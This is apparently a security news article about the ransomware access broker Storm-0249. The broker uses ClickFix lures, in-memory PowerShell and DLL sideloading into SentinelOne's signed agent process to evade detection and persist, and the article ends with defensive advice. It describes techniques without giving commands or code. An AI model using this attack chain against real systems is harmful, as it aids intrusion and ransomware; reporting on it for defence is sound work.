A ransomware initial access broker (IAB) tracked as Storm-0249 has been observed abusing trusted Endpoint Detection and Response (EDR) solutions—specifically SentinelOne components—to execute malware stealthily and establish persistence on victim systems. 

This technique allows attackers to blend malicious activity with legitimate security processes, evading detection by making it appear as routine EDR operations. While the analyzed campaign targeted SentinelOne, researchers note it could apply to other EDR products. Storm-0249, linked to affiliates of ransomware groups like LockBit and ALPHV (BlackCat), uses this method to prepare environments for data exfiltration and encryption.

Attack Chain

The intrusion begins with ClickFix social engineering, where victims are tricked into pasting malicious curl commands into the Windows Run dialog. These commands download an MSI installer with SYSTEM privileges from a spoofed Microsoft domain. To avoid disk-based detection:

•  A malicious PowerShell script is fetched and executed directly in memory, bypassing antivirus scans.

The MSI then deploys a malicious DLL named SentinelAgentCore.dll, placed next to the legitimate SentinelAgentWorker.exe (part of SentinelOne’s EDR). Attackers exploit DLL sideloading by loading this DLL into the signed, privileged EDR process, running the payload under the guise of trusted activity.

From there:

•  The malware profiles the system using Windows utilities like reg.exe and findstr.exe to query hardware details (e.g., via ‘MachineGuid’ for unique identification).

•  It establishes command-and-control (C2) communication over encrypted HTTPS.

•  Persistence is maintained by hijacking the EDR process, which survives OS updates and appears benign to security tools.

As ReliaQuest researchers explain: “The legitimate process does all the work, running the attacker’s code, appearing as routine SentinelOne activity to security tools and bypassing detection.”

Why This is Effective for Stealth

•  Living-off-the-Land Binaries (LoLBin) Abuse: Legitimate tools like curl and reg.exe don’t trigger alerts when run from a trusted EDR context.

•  Process Masquerading: Security mechanisms often whitelist EDR processes, ignoring their actions.

•  Tailored for Ransomware: The setup enables lateral movement and data staging for high-impact attacks.

Defensive Recommendations

To counter this:

•  Implement behavior-based detection to flag trusted processes loading unsigned DLLs from unusual paths.

•  Enforce stricter controls on high-risk tools like curl, PowerShell, and LoLBins (e.g., via AppLocker or endpoint policies).

•  Monitor for anomalous EDR process behavior, such as unexpected DLL loads or network traffic.

•  Train users on ClickFix lures and validate downloads from “official” domains.

This campaign highlights the evolving risks of supply-chain-like attacks on security tools themselves. For full details, refer to the original analysis.